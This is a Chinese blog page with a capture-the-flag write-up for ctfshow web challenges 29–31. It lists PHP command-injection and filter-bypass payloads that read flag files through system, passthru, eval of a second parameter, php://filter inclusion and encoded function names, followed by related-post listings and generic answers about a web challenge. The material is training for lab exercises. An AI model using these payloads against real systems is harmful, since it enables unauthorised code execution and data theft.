ctfshow-web-命令执行

已于 2024-03-24 02:30:31 修改
阅读量635 收藏 12
点赞数 7
分类专栏: CTF-WEB 文章标签: 网络安全
于 2024-02-19 13:23:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xunyue88/article/details/136167340
版权
文章详细讨论了在Web应用中,如何利用GET参数的不当处理进行系统命令执行、文件包含、编码绕过等攻击手段,以及后续版本中对PHP函数、字符和伪协议的过滤措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. web29
    eval了GET的参数,没过滤就system执行,但是匹配到大小写的flag就不执行。

    ①直接执行系统命令
    ?c=system(“tac fla*”);
    ?c=system(“cp flg.php a.txt ");
    ?c=passthru("cat fl    ”);
    ?c=echo shell_exec(“tac fl*”);
    ?c=echo exec(“cat fl*”);
    ?c=highlight_file(next(array_reverse(scandir(“.”))));

    ②内敛执行
    ?c=echo cat fl*;
    ?c=echo cat fl??.?hp;

    ③利用参数输入+eval
    ?c=eval($_GET[1]);&1=system(‘tac fla*’);

    ④利用参数输入+include+伪协议(不用括号、分号)
    ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. web30
    过滤了php、flag、system
    补充打印文件命令?c=echo%20nl%20fl%27%27ag.p%27%27hp;

  3. web31
    preg_match(“/flag|system|php|cat|sort|shell|.| |'/i”, $c)
    其他的过滤了无所谓,但过滤了.和空格

    ①其实就是highlight_file(flag.php);的url编码,适用php7
    ?c=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8F%97%8F);

    ②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入
    ?c=eval($_GET[a]);&a=system(‘cat flag.php’);

    ③用函数绕
    ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
    ?c=show_source(scandir(getcwd())[2]);

    localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要

最低0.47元/天 解锁文章
ctfshow-web入门-命令执行-web29
HkD01L的博客
06-21 386
ctfshow,命令执行web29
2024年网安最全ctfshow-web-命令执行
2401_84264610的博客
05-01 314
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
CTFSHOW WEB入门——命令执行
Chur的博客
10-09 1255
ctfshow 靶场 web入门 命令执行系列
CTFShow Web入门 命令执行(持续更新)
tj13995958709的博客
04-22 2680
3.array_pop(next(get_defined_vars()))是将数组中最后一个键值对的值弹出,配和POST传入的1=phpinfo();过滤了数字、大小写字母和一些特殊符号,基本大部分的都过滤了,只能对ASCII码中没被过滤的字符进行匹配,需要用到python写一个自动化脚本,以下是摘自往上的python脚本代码。除了system()、反引号``可以执行系统命令,exec()、shell_exec()、passthru()等函数也可以。这题又多过滤的几个特殊符号,通配符*被过滤了,可以用?
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 1806
CTFshow Web入门 命令执行
ctfshow-web入门-命令执行
qq_43618536的博客
07-08 1303
ctfshow-web入门-命令执行
网络安全最全ctfshow-web-命令执行
2401_84301922的博客
05-04 364
localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以。的url编码,适用php7。②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入。scandir():遍历目录,这里因为参数为"."所以遍历当前目录。④利用参数输入+include+伪协议(不用括号、分号)pos():输出数组第一个元素,不改变指针。其他的过滤了无所谓,但过滤了.和空格。
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp(1)
2301_82056337的博客
05-07 1117
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 381
ctfshow,命令执行,web30
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 1120
本篇文章是ctfshowweb入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTFSHOW-WEB入门命令执行部分(持续更新)
Npceer-一位网安初学者的博客
02-01 717
命令执行0x01 web29 0x01 web29 笔记记在了另一个博客里面 第一次学命令执行 看了各路大佬的wp以及讲解视频 才能勉强拿到flag 视频 我这里就不细写了 自己也是一知半解 就不丢人了 大概学了手反引号和通配符的知识 ...
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2991
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
CTFshow 命令执行web入门30-39
qzh3485535的博客
03-18 1610
查看源码后得到flag,以下还有以下试出来的别的payload.php');?????');为什么?可以成功绕过呢,因为cat命令可以接受一个通配符为参数,如果以??????为参数它就会匹配长度为4后缀为3的文件,而这其中包括了flag.php。
CTFshow 命令执行 web30
Kradress的博客
10-29 176
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
CTFSHOW web入门——web30
m0_74093152的博客
04-23 321
passthru()函数同system()函数类似,都可以用来执行外部命令的,因此可以用passthru来代替system。因此构造payload:?把flag、system、php都给过滤了。查看页面源代码即可获得flag。
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5651
CTFshow web入门 命令执行 ctfshowweb命令执行
Ctfshow web入门-web30 WP
qq_45427131的博客
05-13 1238
拿到url首先查看源码,发现源码对比上一题只是多了个对输入值system的过滤 preg_match函数过滤system函数,但是php中执行方法的函数有很多,比如passthru、exec,shell_exec等 ,注意exec对执行的结果不输出 passthru和system的作用是一样的,解题的姿势有很多,本文简述几种解题方式 解法一: 这里用exec执行函数,虽然exec对执行结果不输出,但是不代表不可以查看flag,这里用函数执行复制(将flag复制给1.txt,直接用浏览器访问1.txt),
ctfshow命令执行web30-39
m0_62584974的博客
04-05 1651
ctf命令执行
ctfshow-web入门-命令执行web30-web36)
最新发布
Welcome To Myon'Blog !
06-06 1455
命令执行,需要严格的过滤。
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值